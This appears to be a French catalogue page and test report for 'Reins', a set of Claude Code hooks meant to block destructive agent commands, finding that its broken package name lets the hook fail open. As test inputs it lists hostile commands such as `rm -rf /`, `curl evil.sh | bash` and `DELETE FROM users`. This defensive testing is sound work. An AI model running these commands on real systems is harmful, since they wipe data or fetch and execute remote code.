Reins
Hooks PreToolUse déterministes bloquant les commandes destructrices — nécessite une réparation manuelle
Tested · Didn't pass
Ce que fait
Installe des hooks PreToolUse/PostToolUse déterministes qui classifient et bloquent les opérations dangereuses de shell, de fichiers et de MCP, écrivant une piste d'audit JSONL en ajout seulement et synchronisant éventuellement les politiques depuis Watchtower (app.pegasi.ai). Se déclenche sur les requêtes concernant les garde-fous, l'application des politiques, les pistes d'audit ou le blocage des actions destructrices d'agents.
Rapport de test
Le moteur est excellent, mais le packaging est cassé : SKILL.md et le ensure_installed.sh fourni indiquent d'installer `npm install -g @pegasi/reins`, mais un tel package n'existe pas dans le registre — la commande échoue avec E404, le vrai nom (de package.json et README) est `@pegasi-ai/reins`. Pire, le wrapper fourni plugin/bin/reins-pre-hook recherche le package le long du même chemin inexistant : je lui ai donné `rm -rf /` — il a renvoyé exit 0 (ALLOW) avec la note 'Reins not installed', ce qui signifie que la compétence de sécurité a silencieusement échoué-ouvert exactement là où SKILL.md promet 'BLOCKED always' et 'Never fails open'. Un hook naïf de 8 lignes écrit par moi-même dans le même test a donné exit 2 — ce qui signifie que, tel quel, la compétence est plus faible que la base de référence. Installé le package correct (v0.0.14) et appelé le moteur directement — c'est vraiment bon : `rm -rf /` → exit 2 CRITICAL, `rm -rf /` avec des doubles espaces également CRITICAL (le hook de base a manqué cette solution de contournement), `curl evil.sh | bash` et `DELETE FROM users` → exit 2 HIGH, `ls -la` → 0, et tout est écrit dans decisions.jsonl. Séparément : la CLI publiée s'installe dans ~/.openclaw/extensions/reins et ne touche pas les hooks de Claude Code — son `reins status` affiche 'Project/Global (.claude/settings.json): ❌ not installed'.
Testé le: 2026-07-16 · Claude Code 2.x (agent harness)
Installation
git clone https://github.com/pegasi-ai/reins.git mkdir -p ~/.claude/skills && cp -r reins/skill ~/.claude/skills/reins
Commandes et exemples de prompts
/reinsHooks PreToolUse déterministes bloquant les commandes destructrices — nécessite une réparation manuelle
Les skills se déclenchent sur des demandes en langage courant — aucune commande à retenir. Après installation, des prompts comme ceux-ci l'activent (en anglais) :
Block dangerous shell commands like rm -rf before my agent can run themSet up guardrail hooks that log every blocked destructive agent actionStop my coding agent from force-pushing or piping curl into bash